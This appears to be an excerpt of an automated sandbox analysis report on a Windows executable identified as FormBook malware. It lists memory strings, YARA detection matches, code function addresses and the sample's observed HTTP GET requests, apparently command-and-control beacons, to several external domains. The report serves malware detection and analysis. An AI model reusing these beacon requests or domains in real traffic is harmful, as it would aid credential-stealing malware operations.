          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: chkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
          Source: chkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://parking.bodiscdn.com
          Source: chkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: unknownDNS traffic detected: queries for: www.experiencedlawfirms.com
          Source: global trafficHTTP traffic detected: GET /cbgo/?Xf3=7nL8&4hPx=7Chnk+6aZrnZKD5hPI2GMOI+n7dvSwdfhhGQh0Quh+scZbPipDWGAiRMNWcFVsP/HL+E HTTP/1.1Host: www.experiencedlawfirms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /cbgo/?4hPx=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&Xf3=7nL8 HTTP/1.1Host: www.totalwinerewards.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf HTTP/1.1Host: www.casatowerofficial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8 HTTP/1.1Host: www.bitconga.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /cbgo/?4hPx=t6byCRjNUQvGMW438Oj8n0b0Tq5DbL5JR7oEbxqA77YwnlkkuyfhzykLt/IStXAvHe2n&Xf3=7nL8 HTTP/1.1Host: www.omnipets.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.GV8EJooYMIgEnEk.exe.28fd388.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.GV8EJooYMIgEnEk.exe.2979c1c.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: GV8EJooYMIgEnEk.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.GV8EJooYMIgEnEk.exe.28fd388.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.GV8EJooYMIgEnEk.exe.2979c1c.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 0_2_0275E6D80_2_0275E6D8
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 0_2_0275C2940_2_0275C294
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 0_2_0275E6C80_2_0275E6C8
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 0_2_071602340_2_07160234
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 0_2_071692D00_2_071692D0
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 0_2_0716003F0_2_0716003F
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 0_2_071600400_2_07160040
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041B8C33_2_0041B8C3
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041C0CD3_2_0041C0CD
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041C8EE3_2_0041C8EE
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041C8F83_2_0041C8F8
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_00408C7F3_2_00408C7F
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041C4353_2_0041C435
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_00408C803_2_00408C80
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041CF033_2_0041CF03
